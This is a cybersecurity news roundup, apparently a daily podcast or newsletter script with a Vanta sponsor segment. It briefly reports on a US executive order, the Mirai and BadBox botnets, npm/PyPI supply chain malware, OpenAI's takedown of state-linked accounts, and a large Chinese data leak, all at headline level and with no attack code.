In today’s cybersecurity news…
Presidential cyber executive order signed
The President signed a new executive order aimed at refocusing U.S. cybersecurity policy by emphasizing secure software development, updated encryption, and internet routing security. The order revokes parts of Biden- and Obama-era directives, including digital identity initiatives, which it claims could increase fraud risks. It criticizes the previous administration for politicizing cybersecurity and shifts AI policy from potential censorship to identifying vulnerabilities. The order rolls back compliance mandates for software vendors, instead encouraging collaboration with industry partners. It also targets post-quantum cryptography and consumer device security.
Neuberger warns of U.S. infrastructure’s cyberattack weakness
Former NSA cybersecurity director Anne Neuberger warned that U.S. critical infrastructure would likely collapse under a major cyberattack due to vulnerabilities and workforce cuts, particularly under the current administration. Speaking at the AI Expo for National Competitiveness, she criticized recent reductions at CISA, which she said weakened national defenses. Neuberger advocated for AI-driven solutions, including using AI to assess legacy systems and digital twins to simulate infrastructure vulnerabilities. She emphasized that while talent losses are harmful, AI offers a strategic opportunity to enhance cybersecurity and fill critical gaps in protecting essential U.S. systems.
Mirai botnet infects TBK DVR devices via command injection flaw
This is a new variant of the Mirai malware botnet, and it is exploiting a command injection vulnerability in TBK DVR-4104 and 4216 digital video recording devices. The flaw, which has a CVE number (CVE-2024-3721), is a command injection vulnerability that was disclosed by security researcher “netsecfish” in April 2024 and published initially as a proof-of-concept, although Kaspersky researchers now report seeing active exploitation. The exploit delivers ARM32 malware, which connects to a C2 server to pull the device into a botnet swarm, making it conduct DDoS attacks and other malicious behavior.
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation
The owner of ChatGPT says threat actors from countries such as China, Russia, North Korea, Iran, and the Philippines are using the LLM product for three key areas of activity: social media comment generation; malware refinement and cyberattack assistance; and foreign employment scams. One example: using ChatGPT to publish comments on topics such as U.S. politics, on TikTok, X, Reddit, Facebook, and other social media platforms and then shifting to other accounts that would reply to the same comments. They have also been using it to assist with writing scripts for brute-forcing passwords, as well in conducting employment scams, including arranging for delivery of company laptops.
Huge thanks to our sponsor, Vanta
With Vanta, GRC can be so. much. easier—while also strengthening your security posture and driving revenue for your business. Vanta automates key areas of your GRC program—including compliance, risk, and customer trust—and streamlines the way you manage information.
The impact is real: A recent IDC analysis found that compliance teams using Vanta are one hundred and twenty nine percent more productive.
Get back time to focus on strengthening security and scaling your business. Get started at Vanta.com/headlines.
Supply chain malware hits npm and PyPI Ecosystems, targeting a global audience
This particular supply chain attack targets more than a dozen packages associated with the UI component library GlueStack to deliver malware. According to Aikido Security, the malware allows an attacker to run shell commands, take screenshots, upload files, steal sensitive information, and mine cryptocurrency. It is currently seeing nearly 1 million downloads per week. As posted in The Hacker News, “the code injected into the packages is “similar to the remote access trojan that was delivered following the compromise of another npm package “rand-user-agent” last month, indicating that the same threat actors could be behind the activity.”
BadBox botnet continues to exploit off-brand IoT devices
Following up on a story we covered last December, the BadBox 2.0 malware campaign continues to infect millions of connected devices worldwide, specifically IoT hardware such as “TV streaming devices, digital projectors, aftermarket vehicle infotainment systems, digital picture frames and other products.” It is exploiting these devices for criminal activity, according to the FBI. The agency says, “the malware can come pre-installed in off-brand or aftermarket devices or arrive alongside software updates from sketchy sources.” The botnet allows its owners to “mask their activity by making it appear to come from legitimate home networks, also known as residential proxies. In some cases, the operators sell access to the botnet to other cybercriminals,” the alert said.
Microsoft shares script to restore inetpub folder that you shouldn’t have deleted
The PowerShell script released by Microsoft will help restore an empty ‘inetpub’ folder that had been created by the April 2025 Windows security updates. This helps mitigate a high-severity Windows Process Activation privilege escalation vulnerability, but many users have deleted it, believing it to not be needed. This caused some people to remove the folder, making them vulnerable again to the patched vulnerability.
Massive data breach of over 4 billion user records were found exposed online
Cybersecurity researcher Bob Dyachenko and the Cybernews team uncovered a massive 631GB unsecured database in China containing over 4 billion records, likely affecting hundreds of millions of users. The leaked data includes WeChat, Alipay, financial, residential, and ID information, suggesting it was compiled for profiling, surveillance, or data enrichment. The largest collection, “wechatid\_db,” contained over 805 million records. Other collections included banking and address data. Researchers warn that threat actors could exploit the trove for fraud, phishing, blackmail, or even state-sponsored disinformation. The database was taken offline shortly after discovery, and its owner remains unidentified.